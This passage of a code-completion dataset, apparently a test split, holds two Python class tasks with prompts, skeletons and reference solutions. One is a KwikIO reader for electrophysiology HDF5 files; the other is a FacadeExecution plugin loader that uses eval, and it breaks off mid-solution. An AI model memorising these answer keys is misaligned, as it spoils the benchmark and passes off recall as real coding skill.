\"reading\" experimental data from a .kwik file. Generates a :class:`Segment` with a :class:`AnalogSignal`", "class_name": "KwikIO", "detected_licenses": ["LicenseRef-scancode-unknown-license-reference", "BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass KwikIO:\n \"\"\"Class for \"reading\" experimental data from a .kwik file. 
Generates a :class:`Segment` with a :class:`AnalogSignal`\"\"\"\n\n def __init__(self, filename, dataset=0):\n \"\"\"Arguments: filename : the filename dataset: points to a specific dataset in the .kwik and .raw.kwd file, however this can be an issue to change in e.g. OpenElectrophy or Spykeviewer\"\"\"\n <|body_0|>\n\n def read_block(self, lazy=False, cascade=True, channel_index=None):\n \"\"\"Arguments: Channel_index: can be int, iterable or None to select one, many or all channel(s)\"\"\"\n <|body_1|>\n\n def read_analogsignal(self, channel_index=None, lazy=False, cascade=True):\n \"\"\"Read raw traces Arguments: channel_index: must be integer array\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n BaseIO.__init__(self)\n self._filename = filename\n self._path, file = os.path.split(filename)\n self._kwik = h5py.File(filename, 'r')\n self._dataset = dataset\n try:\n rawfile = self._kwik['recordings'][str(self._dataset)]['raw'].attrs['hdf5_path']\n rawfile = rawfile.split('/')[0]\n except:\n rawfile = file.split('.')[0] + '_100.raw.kwd'\n self._kwd = h5py.File(self._path + os.sep + rawfile, 'r')\n self._attrs = {}\n self._attrs['kwik'] = self._kwik['recordings'][str(self._dataset)].attrs\n self._attrs['kwd'] = self._kwd['recordings'][str(self._dataset)].attrs\n self._attrs['shape'] = self._kwd['recordings'][str(self._dataset)]['data'].shape\n try:\n self._attrs['app_data'] = self._kwd['recordings'][str(self._dataset)]['application_data'].attrs\n except:\n self._attrs['app_data'] = False\n<|end_body_0|>\n\n<|body_start_1|>\n blk = Block()\n if cascade:\n seg = Segment(file_origin=self._filename)\n blk.segments += [seg]\n if channel_index:\n if type(channel_index) is int:\n channel_index = [channel_index]\n if type(channel_index) is list:\n channel_index = np.array(channel_index)\n else:\n channel_index = np.arange(0, self._attrs['shape'][1])\n chx = ChannelIndex(name='all channels', index=channel_index)\n blk.channel_indexes.append(chx)\n ana = self.read_analogsignal(channel_index=channel_index, lazy=lazy, cascade=cascade)\n ana.channel_index = chx\n seg.duration = self._attrs['shape'][0] / self._attrs['kwik']['sample_rate'] * pq.s\n blk.create_many_to_one_relationship()\n return blk\n<|end_body_1|>\n\n<|body_start_2|>\n if self._attrs['app_data']:\n bit_volts = self._attrs['app_data']['channel_bit_volts']\n sig_unit = 'uV'\n else:\n bit_volts = np.ones(self._attrs['shape'][1])\n sig_unit = 'bit'\n if lazy:\n anasig = AnalogSignal([], units=sig_unit, sampling_rate=self._attrs['kwik']['sample_rate'] * pq.Hz, t_start=self._attrs['kwik']['start_time'] * pq.s)\n anasig.lazy_shape = self._attrs['shape'][0]\n else:\n data = self._kwd['recordings'][str(self._dataset)]['data'].value[:, channel_index]\n data = data * bit_volts[channel_index]\n anasig = AnalogSignal(data, units=sig_unit, sampling_rate=self._attrs['kwik']['sample_rate'] * pq.Hz, t_start=self._attrs['kwik']['start_time'] * pq.s)\n data = []\n anasig.annotate(info='raw traces')\n return anasig\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000454", "length_bytes": 6675, "license_type": "permissive", "methods": [{"docstring": "Arguments: filename : the filename dataset: points to a specific dataset in the .kwik and .raw.kwd file, however this can be an issue to change in e.g. 
OpenElectrophy or Spykeviewer", "name": "__init__", "signature": "def __init__(self, filename, dataset=0)"}, {"docstring": "Arguments: Channel_index: can be int, iterable or None to select one, many or all channel(s)", "name": "read_block", "signature": "def read_block(self, lazy=False, cascade=True, channel_index=None)"}, {"docstring": "Read raw traces Arguments: channel_index: must be integer array", "name": "read_analogsignal", "signature": "def read_analogsignal(self, channel_index=None, lazy=False, cascade=True)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_004500", "prompt": "Implement the Python class `KwikIO` described below.\n\nClass description:\nClass for \"reading\" experimental data from a .kwik file. Generates a :class:`Segment` with a :class:`AnalogSignal`\n\nMethod signatures and docstrings:\n- def __init__(self, filename, dataset=0): Arguments: filename : the filename dataset: points to a specific dataset in the .kwik and .raw.kwd file, however this can be an issue to change in e.g. OpenElectrophy or Spykeviewer\n- def read_block(self, lazy=False, cascade=True, channel_index=None): Arguments: Channel_index: can be int, iterable or None to select one, many or all channel(s)\n- def read_analogsignal(self, channel_index=None, lazy=False, cascade=True): Read raw traces Arguments: channel_index: must be integer array", "prompted_full_text": "Implement the Python class `KwikIO` described below.\n\nClass description:\nClass for \"reading\" experimental data from a .kwik file. Generates a :class:`Segment` with a :class:`AnalogSignal`\n\nMethod signatures and docstrings:\n- def __init__(self, filename, dataset=0): Arguments: filename : the filename dataset: points to a specific dataset in the .kwik and .raw.kwd file, however this can be an issue to change in e.g. OpenElectrophy or Spykeviewer\n- def read_block(self, lazy=False, cascade=True, channel_index=None): Arguments: Channel_index: can be int, iterable or None to select one, many or all channel(s)\n- def read_analogsignal(self, channel_index=None, lazy=False, cascade=True): Read raw traces Arguments: channel_index: must be integer array\n\n<|skeleton|>\nclass KwikIO:\n \"\"\"Class for \"reading\" experimental data from a .kwik file. Generates a :class:`Segment` with a :class:`AnalogSignal`\"\"\"\n\n def __init__(self, filename, dataset=0):\n \"\"\"Arguments: filename : the filename dataset: points to a specific dataset in the .kwik and .raw.kwd file, however this can be an issue to change in e.g. 
OpenElectrophy or Spykeviewer\"\"\"\n <|body_0|>\n\n def read_block(self, lazy=False, cascade=True, channel_index=None):\n \"\"\"Arguments: Channel_index: can be int, iterable or None to select one, many or all channel(s)\"\"\"\n <|body_1|>\n\n def read_analogsignal(self, channel_index=None, lazy=False, cascade=True):\n \"\"\"Read raw traces Arguments: channel_index: must be integer array\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n BaseIO.__init__(self)\n self._filename = filename\n self._path, file = os.path.split(filename)\n self._kwik = h5py.File(filename, 'r')\n self._dataset = dataset\n try:\n rawfile = self._kwik['recordings'][str(self._dataset)]['raw'].attrs['hdf5_path']\n rawfile = rawfile.split('/')[0]\n except:\n rawfile = file.split('.')[0] + '_100.raw.kwd'\n self._kwd = h5py.File(self._path + os.sep + rawfile, 'r')\n self._attrs = {}\n self._attrs['kwik'] = self._kwik['recordings'][str(self._dataset)].attrs\n self._attrs['kwd'] = self._kwd['recordings'][str(self._dataset)].attrs\n self._attrs['shape'] = self._kwd['recordings'][str(self._dataset)]['data'].shape\n try:\n self._attrs['app_data'] = self._kwd['recordings'][str(self._dataset)]['application_data'].attrs\n except:\n self._attrs['app_data'] = False\n<|end_body_0|>\n\n<|body_start_1|>\n blk = Block()\n if cascade:\n seg = Segment(file_origin=self._filename)\n blk.segments += [seg]\n if channel_index:\n if type(channel_index) is int:\n channel_index = [channel_index]\n if type(channel_index) is list:\n channel_index = np.array(channel_index)\n else:\n channel_index = np.arange(0, self._attrs['shape'][1])\n chx = ChannelIndex(name='all channels', index=channel_index)\n blk.channel_indexes.append(chx)\n ana = self.read_analogsignal(channel_index=channel_index, lazy=lazy, cascade=cascade)\n ana.channel_index = chx\n seg.duration = self._attrs['shape'][0] / self._attrs['kwik']['sample_rate'] * pq.s\n blk.create_many_to_one_relationship()\n return blk\n<|end_body_1|>\n\n<|body_start_2|>\n if self._attrs['app_data']:\n bit_volts = self._attrs['app_data']['channel_bit_volts']\n sig_unit = 'uV'\n else:\n bit_volts = np.ones(self._attrs['shape'][1])\n sig_unit = 'bit'\n if lazy:\n anasig = AnalogSignal([], units=sig_unit, sampling_rate=self._attrs['kwik']['sample_rate'] * pq.Hz, t_start=self._attrs['kwik']['start_time'] * pq.s)\n anasig.lazy_shape = self._attrs['shape'][0]\n else:\n data = self._kwd['recordings'][str(self._dataset)]['data'].value[:, channel_index]\n data = data * bit_volts[channel_index]\n anasig = AnalogSignal(data, units=sig_unit, sampling_rate=self._attrs['kwik']['sample_rate'] * pq.Hz, t_start=self._attrs['kwik']['start_time'] * pq.s)\n data = []\n anasig.annotate(info='raw traces')\n return anasig\n<|end_body_2|>\n", "revision_id": "e06cda2bd4ec849655de76bea563c597fbdb41e3", "skeleton": "<|skeleton|>\nclass KwikIO:\n \"\"\"Class for \"reading\" experimental data from a .kwik file. Generates a :class:`Segment` with a :class:`AnalogSignal`\"\"\"\n\n def __init__(self, filename, dataset=0):\n \"\"\"Arguments: filename : the filename dataset: points to a specific dataset in the .kwik and .raw.kwd file, however this can be an issue to change in e.g. 
OpenElectrophy or Spykeviewer\"\"\"\n <|body_0|>\n\n def read_block(self, lazy=False, cascade=True, channel_index=None):\n \"\"\"Arguments: Channel_index: can be int, iterable or None to select one, many or all channel(s)\"\"\"\n <|body_1|>\n\n def read_analogsignal(self, channel_index=None, lazy=False, cascade=True):\n \"\"\"Read raw traces Arguments: channel_index: must be integer array\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class KwikIO:\n \"\"\"Class for \"reading\" experimental data from a .kwik file. Generates a :class:`Segment` with a :class:`AnalogSignal`\"\"\"\n\n def __init__(self, filename, dataset=0):\n \"\"\"Arguments: filename : the filename dataset: points to a specific dataset in the .kwik and .raw.kwd file, however this can be an issue to change in e.g. OpenElectrophy or Spykeviewer\"\"\"\n BaseIO.__init__(self)\n self._filename = filename\n self._path, file = os.path.split(filename)\n self._kwik = h5py.File(filename, 'r')\n self._dataset = dataset\n try:\n rawfile = self._kwik['recordings'][str(self._dataset)]['raw'].attrs['hdf5_path']\n rawfile = rawfile.split('/')[0]\n except:\n rawfile = file.split('.')[0] + '_100.raw.kwd'\n self._kwd = h5py.File(self._path + os.sep + rawfile, 'r')\n self._attrs = {}\n self._attrs['kwik'] = self._kwik['recordings'][str(self._dataset)].attrs\n self._attrs['kwd'] = self._kwd['recordings'][str(self._dataset)].attrs\n self._attrs['shape'] = self._kwd['recordings'][str(self._dataset)]['data'].shape\n try:\n self._attrs['app_data'] = self._kwd['recordings'][str(self._dataset)]['application_data'].attrs\n except:\n self._attrs['app_data'] = False\n\n def read_block(self, lazy=False, cascade=True, channel_index=None):\n \"\"\"Arguments: Channel_index: can be int, iterable or None to select one, many or all channel(s)\"\"\"\n blk = Block()\n if cascade:\n seg = Segment(file_origin=self._filename)\n blk.segments += [seg]\n if channel_index:\n if type(channel_index) is int:\n channel_index = [channel_index]\n if type(channel_index) is list:\n channel_index = np.array(channel_index)\n else:\n channel_index = np.arange(0, self._attrs['shape'][1])\n chx = ChannelIndex(name='all channels', index=channel_index)\n blk.channel_indexes.append(chx)\n ana = self.read_analogsignal(channel_index=channel_index, lazy=lazy, cascade=cascade)\n ana.channel_index = chx\n seg.duration = self._attrs['shape'][0] / self._attrs['kwik']['sample_rate'] * pq.s\n blk.create_many_to_one_relationship()\n return blk\n\n def read_analogsignal(self, channel_index=None, lazy=False, cascade=True):\n \"\"\"Read raw traces Arguments: channel_index: must be integer array\"\"\"\n if self._attrs['app_data']:\n bit_volts = self._attrs['app_data']['channel_bit_volts']\n sig_unit = 'uV'\n else:\n bit_volts = np.ones(self._attrs['shape'][1])\n sig_unit = 'bit'\n if lazy:\n anasig = AnalogSignal([], units=sig_unit, sampling_rate=self._attrs['kwik']['sample_rate'] * pq.Hz, t_start=self._attrs['kwik']['start_time'] * pq.s)\n anasig.lazy_shape = self._attrs['shape'][0]\n else:\n data = self._kwd['recordings'][str(self._dataset)]['data'].value[:, channel_index]\n data = data * bit_volts[channel_index]\n anasig = AnalogSignal(data, units=sig_unit, sampling_rate=self._attrs['kwik']['sample_rate'] * pq.Hz, t_start=self._attrs['kwik']['start_time'] * pq.s)\n data = []\n anasig.annotate(info='raw traces')\n return anasig\n", "source": "the_stack_v2_python_sparse", "source_path": 
"pore_stats/rp/python-neo-master/neo/io/kwikio.py", "source_repo": "codycombs/pore_stats", "split": "test", "star_events_count": 0} {"blob_id": "9a1fec6a5f68cf484ebbfd2566c6515dbbe380aa", "bodies": ["my_module_path = str_plugin_path\nmy_plugin = str_plugin\ntry:\n my_module = importlib.import_module(my_module_path)\n evaluated_plugin_str = 'my_module.%s' % my_plugin\n my_class = eval(evaluated_plugin_str)\nexcept Exception:\n raise Exception('Failed to evaluate ExecEngine plugin %s.%s' % (str_plugin_path, str_plugin))\nreturn my_class", "if isinstance(implem, str):\n my_implementation = ImplementationDao.find_business_elem_with_key(implem)\nelse:\n my_implementation = implem\nmy_exec_algo = FacadeExecution.factory.build_exec_algo_without_custom(implementation=my_implementation, input_names=input_arg_names, input_values_or_sources=input_data_sources, output_names=output_arg_names, output_receivers=output_data_receivers)\nif exec_algo_db_id is not None:\n my_exec_algo.set_process_id(exec_algo_db_id)\nreturn FacadeExecution.execute_algo(executable_algo=my_exec_algo, debug=run_debug, dao_managed=dao_managed)", "parsed_plugin = executable_algo.get_execution_plugin().split('::')\nmodule_path = parsed_plugin[0]\nplugin_class_name = parsed_plugin[1]\nmy_plugin_class = FacadeExecution.__eval_exec_engine_class(module_path, plugin_class_name)\nmy_engine = my_plugin_class(executable_algo, debug, dao_managed)\nmy_status = my_engine.execute()\nreturn (my_engine.get_executable_algo(), my_status)"], "bodies_text": "<|body_start_0|>\n my_module_path = str_plugin_path\n my_plugin = str_plugin\n try:\n my_module = importlib.import_module(my_module_path)\n evaluated_plugin_str = 'my_module.%s' % my_plugin\n my_class = eval(evaluated_plugin_str)\n except Exception:\n raise Exception('Failed to evaluate ExecEngine plugin %s.%s' % (str_plugin_path, str_plugin))\n return my_class\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(implem, str):\n my_implementation = ImplementationDao.find_business_elem_with_key(implem)\n else:\n my_implementation = implem\n my_exec_algo = FacadeExecution.factory.build_exec_algo_without_custom(implementation=my_implementation, input_names=input_arg_names, input_values_or_sources=input_data_sources, output_names=output_arg_names, output_receivers=output_data_receivers)\n if exec_algo_db_id is not None:\n my_exec_algo.set_process_id(exec_algo_db_id)\n return FacadeExecution.execute_algo(executable_algo=my_exec_algo, debug=run_debug, dao_managed=dao_managed)\n<|end_body_1|>\n\n<|body_start_2|>\n parsed_plugin = executable_algo.get_execution_plugin().split('::')\n module_path = parsed_plugin[0]\n plugin_class_name = parsed_plugin[1]\n my_plugin_class = FacadeExecution.__eval_exec_engine_class(module_path, plugin_class_name)\n my_engine = my_plugin_class(executable_algo, debug, dao_managed)\n my_status = my_engine.execute()\n return (my_engine.get_executable_algo(), my_status)\n<|end_body_2|>\n", "class_docstring": "Provides services for the execution of algorithms. FacadeExecution.factory is an instance of FactoryExecAlgo, which must be used to instantiate separately executable algorithms Typical use of this facade: 1) Simplest use: my_exec_algo, exec_status = FacadeExecution.execute( ... ) 2) Separating steps : initializing algo, connecting data sources and executing algo # It is useful to have a separate step connecting data sources, and receivers # create disconnected algo my_algo = FacadeExecution.factory.get_algo(...) 
# connect missing data sources and receivers my_algo.set_data_source( ...) ... my_algo.set_data_receiver( ...) ... # execute exec_status = FacadeExecution.execute_algo( my_algo )", "class_name": "FacadeExecution", "detected_licenses": ["LGPL-3.0-only", "LGPL-2.0-or-later", "LGPL-3.0-or-later", "Zlib", "BSD-3-Clause", "Python-2.0", "ZPL-2.0", "LicenseRef-scancode-openssl-exception-lgpl3.0plus", "ZPL-2.1", "Apache-2.0", "MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FacadeExecution:\n \"\"\"Provides services for the execution of algorithms. FacadeExecution.factory is an instance of FactoryExecAlgo, which must be used to instantiate separately executable algorithms Typical use of this facade: 1) Simplest use: my_exec_algo, exec_status = FacadeExecution.execute( ... ) 2) Separating steps : initializing algo, connecting data sources and executing algo # It is useful to have a separate step connecting data sources, and receivers # create disconnected algo my_algo = FacadeExecution.factory.get_algo(...) # connect missing data sources and receivers my_algo.set_data_source( ...) ... my_algo.set_data_receiver( ...) ... # execute exec_status = FacadeExecution.execute_algo( my_algo )\"\"\"\n\n def __eval_exec_engine_class(cls, str_plugin_path, str_plugin):\n \"\"\"private class method evaluate the configured engine from module+plugin :param cls: :type cls: :param str_plugin_path: :type str_plugin_path: :param str_plugin: :type str_plugin: :return: subclass of ExecEngine (!!! not an instance !!!)\"\"\"\n <|body_0|>\n\n def execute_algo_without_custom(implem, input_arg_names, input_data_sources, output_arg_names, output_data_receivers, exec_algo_db_id=None, run_debug=False, dao_managed=True):\n \"\"\"Firstly build the ExecutableAlgo: initialized without customized parameters in database (Custom DB is ignored) Secondly run the service FacadeExecution.execute_algo on created algo. 
:param implem: executed implementation :type implem: Implementation :param input_arg_names: complete list of input names :type input_arg_names: list :param input_data_sources: complete list of input values (either explicit values or DataSource subclasses) :type input_data_sources: list :param output_arg_names: complete list of output names :type output_arg_names: list :param output_data_receivers: complete list of output receivers: same length as output_arg_names: each element is either None or instance of Data\"\"\"\n <|body_1|>\n\n def execute_algo(executable_algo, debug=False, dao_managed=False):\n \"\"\"Execute the algorithm according to configured plugin - Retrieves the ExecEngine subclass, - Instantiates the engine for the executable_algo - Execute the engine :param executable_algo: executable algorithm :type executable_algo: apps.algo.execute.models.business.algo.ExecutableAlgo :param debug: optional (default False): flag activating debug traces :type debug: boolean :param dao_managed: optional (default False): flag: when True: activates the persistence of ExecutableAlgo + setting of process_id :type dao_managed: boolean\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n my_module_path = str_plugin_path\n my_plugin = str_plugin\n try:\n my_module = importlib.import_module(my_module_path)\n evaluated_plugin_str = 'my_module.%s' % my_plugin\n my_class = eval(evaluated_plugin_str)\n except Exception:\n raise Exception('Failed to evaluate ExecEngine plugin %s.%s' % (str_plugin_path, str_plugin))\n return my_class\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(implem, str):\n my_implementation = ImplementationDao.find_business_elem_with_key(implem)\n else:\n my_implementation = implem\n my_exec_algo = FacadeExecution.factory.build_exec_algo_without_custom(implementation=my_implementation, input_names=input_arg_names, input_values_or_sources=input_data_sources, output_names=output_arg_names, output_receivers=output_data_receivers)\n if exec_algo_db_id is not None:\n my_exec_algo.set_process_id(exec_algo_db_id)\n return FacadeExecution.execute_algo(executable_algo=my_exec_algo, debug=run_debug, dao_managed=dao_managed)\n<|end_body_1|>\n\n<|body_start_2|>\n parsed_plugin = executable_algo.get_execution_plugin().split('::')\n module_path = parsed_plugin[0]\n plugin_class_name = parsed_plugin[1]\n my_plugin_class = FacadeExecution.__eval_exec_engine_class(module_path, plugin_class_name)\n my_engine = my_plugin_class(executable_algo, debug, dao_managed)\n my_status = my_engine.execute()\n return (my_engine.get_executable_algo(), my_status)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000455", "length_bytes": 6584, "license_type": "permissive", "methods": [{"docstring": "private class method evaluate the configured engine from module+plugin :param cls: :type cls: :param str_plugin_path: :type str_plugin_path: :param str_plugin: :type str_plugin: :return: subclass of ExecEngine (!!! not an instance !!!)", "name": "__eval_exec_engine_class", "signature": "def __eval_exec_engine_class(cls, str_plugin_path, str_plugin)"}, {"docstring": "Firstly build the ExecutableAlgo: initialized without customized parameters in database (Custom DB is ignored) Secondly run the service FacadeExecution.execute_algo on created algo. 
:param implem: executed implementation :type implem: Implementation :param input_arg_names: complete list of input names :type input_arg_names: list :param input_data_sources: complete list of input values (either explicit values or DataSource subclasses) :type input_data_sources: list :param output_arg_names: complete list of output names :type output_arg_names: list :param output_data_receivers: complete list of output receivers: same length as output_arg_names: each element is either None or instance of Data", "name": "execute_algo_without_custom", "signature": "def execute_algo_without_custom(implem, input_arg_names, input_data_sources, output_arg_names, output_data_receivers, exec_algo_db_id=None, run_debug=False, dao_managed=True)"}, {"docstring": "Execute the algorithm according to configured plugin - Retrieves the ExecEngine subclass, - Instantiates the engine for the executable_algo - Execute the engine :param executable_algo: executable algorithm :type executable_algo: apps.algo.execute.models.business.algo.ExecutableAlgo :param debug: optional (default False): flag activating debug traces :type debug: boolean :param dao_managed: optional (default False): flag: when True: activates the persistence of ExecutableAlgo + setting of process_id :type dao_managed: boolean", "name": "execute_algo", "signature": "def execute_algo(executable_algo, debug=False, dao_managed=False)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_004961", "prompt": "Implement the Python class `FacadeExecution` described below.\n\nClass description:\nProvides services for the execution of algorithms. FacadeExecution.factory is an instance of FactoryExecAlgo, which must be used to instantiate separately executable algorithms Typical use of this facade: 1) Simplest use: my_exec_algo, exec_status = FacadeExecution.execute( ... ) 2) Separating steps : initializing algo, connecting data sources and executing algo # It is useful to have a separate step connecting data sources, and receivers # create disconnected algo my_algo = FacadeExecution.factory.get_algo(...) # connect missing data sources and receivers my_algo.set_data_source( ...) ... my_algo.set_data_receiver( ...) ... # execute exec_status = FacadeExecution.execute_algo( my_algo )\n\nMethod signatures and docstrings:\n- def __eval_exec_engine_class(cls, str_plugin_path, str_plugin): private class method evaluate the configured engine from module+plugin :param cls: :type cls: :param str_plugin_path: :type str_plugin_path: :param str_plugin: :type str_plugin: :return: subclass of ExecEngine (!!! not an instance !!!)\n- def execute_algo_without_custom(implem, input_arg_names, input_data_sources, output_arg_names, output_data_receivers, exec_algo_db_id=None, run_debug=False, dao_managed=True): Firstly build the ExecutableAlgo: initialized without customized parameters in database (Custom DB is ignored) Secondly run the service FacadeExecution.execute_algo on created algo. 
:param implem: executed implementation :type implem: Implementation :param input_arg_names: complete list of input names :type input_arg_names: list :param input_data_sources: complete list of input values (either explicit values or DataSource subclasses) :type input_data_sources: list :param output_arg_names: complete list of output names :type output_arg_names: list :param output_data_receivers: complete list of output receivers: same length as output_arg_names: each element is either None or instance of Data\n- def execute_algo(executable_algo, debug=False, dao_managed=False): Execute the algorithm according to configured plugin - Retrieves the ExecEngine subclass, - Instantiates the engine for the executable_algo - Execute the engine :param executable_algo: executable algorithm :type executable_algo: apps.algo.execute.models.business.algo.ExecutableAlgo :param debug: optional (default False): flag activating debug traces :type debug: boolean :param dao_managed: optional (default False): flag: when True: activates the persistence of ExecutableAlgo + setting of process_id :type dao_managed: boolean", "prompted_full_text": "Implement the Python class `FacadeExecution` described below.\n\nClass description:\nProvides services for the execution of algorithms. FacadeExecution.factory is an instance of FactoryExecAlgo, which must be used to instantiate separately executable algorithms Typical use of this facade: 1) Simplest use: my_exec_algo, exec_status = FacadeExecution.execute( ... ) 2) Separating steps : initializing algo, connecting data sources and executing algo # It is useful to have a separate step connecting data sources, and receivers # create disconnected algo my_algo = FacadeExecution.factory.get_algo(...) # connect missing data sources and receivers my_algo.set_data_source( ...) ... my_algo.set_data_receiver( ...) ... # execute exec_status = FacadeExecution.execute_algo( my_algo )\n\nMethod signatures and docstrings:\n- def __eval_exec_engine_class(cls, str_plugin_path, str_plugin): private class method evaluate the configured engine from module+plugin :param cls: :type cls: :param str_plugin_path: :type str_plugin_path: :param str_plugin: :type str_plugin: :return: subclass of ExecEngine (!!! not an instance !!!)\n- def execute_algo_without_custom(implem, input_arg_names, input_data_sources, output_arg_names, output_data_receivers, exec_algo_db_id=None, run_debug=False, dao_managed=True): Firstly build the ExecutableAlgo: initialized without customized parameters in database (Custom DB is ignored) Secondly run the service FacadeExecution.execute_algo on created algo. 
:param implem: executed implementation :type implem: Implementation :param input_arg_names: complete list of input names :type input_arg_names: list :param input_data_sources: complete list of input values (either explicit values or DataSource subclasses) :type input_data_sources: list :param output_arg_names: complete list of output names :type output_arg_names: list :param output_data_receivers: complete list of output receivers: same length as output_arg_names: each element is either None or instance of Data\n- def execute_algo(executable_algo, debug=False, dao_managed=False): Execute the algorithm according to configured plugin - Retrieves the ExecEngine subclass, - Instantiates the engine for the executable_algo - Execute the engine :param executable_algo: executable algorithm :type executable_algo: apps.algo.execute.models.business.algo.ExecutableAlgo :param debug: optional (default False): flag activating debug traces :type debug: boolean :param dao_managed: optional (default False): flag: when True: activates the persistence of ExecutableAlgo + setting of process_id :type dao_managed: boolean\n\n<|skeleton|>\nclass FacadeExecution:\n \"\"\"Provides services for the execution of algorithms. FacadeExecution.factory is an instance of FactoryExecAlgo, which must be used to instantiate separately executable algorithms Typical use of this facade: 1) Simplest use: my_exec_algo, exec_status = FacadeExecution.execute( ... ) 2) Separating steps : initializing algo, connecting data sources and executing algo # It is useful to have a separate step connecting data sources, and receivers # create disconnected algo my_algo = FacadeExecution.factory.get_algo(...) # connect missing data sources and receivers my_algo.set_data_source( ...) ... my_algo.set_data_receiver( ...) ... # execute exec_status = FacadeExecution.execute_algo( my_algo )\"\"\"\n\n def __eval_exec_engine_class(cls, str_plugin_path, str_plugin):\n \"\"\"private class method evaluate the configured engine from module+plugin :param cls: :type cls: :param str_plugin_path: :type str_plugin_path: :param str_plugin: :type str_plugin: :return: subclass of ExecEngine (!!! not an instance !!!)\"\"\"\n <|body_0|>\n\n def execute_algo_without_custom(implem, input_arg_names, input_data_sources, output_arg_names, output_data_receivers, exec_algo_db_id=None, run_debug=False, dao_managed=True):\n \"\"\"Firstly build the ExecutableAlgo: initialized without customized parameters in database (Custom DB is ignored) Secondly run the service FacadeExecution.execute_algo on created algo. 
:param implem: executed implementation :type implem: Implementation :param input_arg_names: complete list of input names :type input_arg_names: list :param input_data_sources: complete list of input values (either explicit values or DataSource subclasses) :type input_data_sources: list :param output_arg_names: complete list of output names :type output_arg_names: list :param output_data_receivers: complete list of output receivers: same length as output_arg_names: each element is either None or instance of Data\"\"\"\n <|body_1|>\n\n def execute_algo(executable_algo, debug=False, dao_managed=False):\n \"\"\"Execute the algorithm according to configured plugin - Retrieves the ExecEngine subclass, - Instantiates the engine for the executable_algo - Execute the engine :param executable_algo: executable algorithm :type executable_algo: apps.algo.execute.models.business.algo.ExecutableAlgo :param debug: optional (default False): flag activating debug traces :type debug: boolean :param dao_managed: optional (default False): flag: when True: activates the persistence of ExecutableAlgo + setting of process_id :type dao_managed: boolean\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n my_module_path = str_plugin_path\n my_plugin = str_plugin\n try:\n my_module = importlib.import_module(my_module_path)\n evaluated_plugin_str = 'my_module.%s' % my_plugin\n my_class = eval(evaluated_plugin_str)\n except Exception:\n raise Exception('Failed to evaluate ExecEngine plugin %s.%s' % (str_plugin_path, str_plugin))\n return my_class\n<|end_body_0|>\n\n<|body_start_1|>\n if isinstance(implem, str):\n my_implementation = ImplementationDao.find_business_elem_with_key(implem)\n else:\n my_implementation = implem\n my_exec_algo = FacadeExecution.factory.build_exec_algo_without_custom(implementation=my_implementation, input_names=input_arg_names, input_values_or_sources=input_data_sources, output_names=output_arg_names, output_receivers=output_data_receivers)\n if exec_algo_db_id is not None:\n my_exec_algo.set_process_id(exec_algo_db_id)\n return FacadeExecution.execute_algo(executable_algo=my_exec_algo, debug=run_debug, dao_managed=dao_managed)\n<|end_body_1|>\n\n<|body_start_2|>\n parsed_plugin = executable_algo.get_execution_plugin().split('::')\n module_path = parsed_plugin[0]\n plugin_class_name = parsed_plugin[1]\n my_plugin_class = FacadeExecution.__eval_exec_engine_class(module_path, plugin_class_name)\n my_engine = my_plugin_class(executable_algo, debug, dao_managed)\n my_status = my_engine.execute()\n return (my_engine.get_executable_algo(), my_status)\n<|end_body_2|>\n", "revision_id": "0b04ab448faf1ffdc89687268c6192e69d61f890", "skeleton": "<|skeleton|>\nclass FacadeExecution:\n \"\"\"Provides services for the execution of algorithms. FacadeExecution.factory is an instance of FactoryExecAlgo, which must be used to instantiate separately executable algorithms Typical use of this facade: 1) Simplest use: my_exec_algo, exec_status = FacadeExecution.execute( ... ) 2) Separating steps : initializing algo, connecting data sources and executing algo # It is useful to have a separate step connecting data sources, and receivers # create disconnected algo my_algo = FacadeExecution.factory.get_algo(...) # connect missing data sources and receivers my_algo.set_data_source( ...) ... my_algo.set_data_receiver( ...) ... 
# execute exec_status = FacadeExecution.execute_algo( my_algo )\"\"\"\n\n def __eval_exec_engine_class(cls, str_plugin_path, str_plugin):\n \"\"\"private class method evaluate the configured engine from module+plugin :param cls: :type cls: :param str_plugin_path: :type str_plugin_path: :param str_plugin: :type str_plugin: :return: subclass of ExecEngine (!!! not an instance !!!)\"\"\"\n <|body_0|>\n\n def execute_algo_without_custom(implem, input_arg_names, input_data_sources, output_arg_names, output_data_receivers, exec_algo_db_id=None, run_debug=False, dao_managed=True):\n \"\"\"Firstly build the ExecutableAlgo: initialized without customized parameters in database (Custom DB is ignored) Secondly run the service FacadeExecution.execute_algo on created algo. :param implem: executed implementation :type implem: Implementation :param input_arg_names: complete list of input names :type input_arg_names: list :param input_data_sources: complete list of input values (either explicit values or DataSource subclasses) :type input_data_sources: list :param output_arg_names: complete list of output names :type output_arg_names: list :param output_data_receivers: complete list of output receivers: same length as output_arg_names: each element is either None or instance of Data\"\"\"\n <|body_1|>\n\n def execute_algo(executable_algo, debug=False, dao_managed=False):\n \"\"\"Execute the algorithm according to configured plugin - Retrieves the ExecEngine subclass, - Instantiates the engine for the executable_algo - Execute the engine :param executable_algo: executable algorithm :type executable_algo: apps.algo.execute.models.business.algo.ExecutableAlgo :param debug: optional (default False): flag activating debug traces :type debug: boolean :param dao_managed: optional (default False): flag: when True: activates the persistence of ExecutableAlgo + setting of process_id :type dao_managed: boolean\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FacadeExecution:\n \"\"\"Provides services for the execution of algorithms. FacadeExecution.factory is an instance of FactoryExecAlgo, which must be used to instantiate separately executable algorithms Typical use of this facade: 1) Simplest use: my_exec_algo, exec_status = 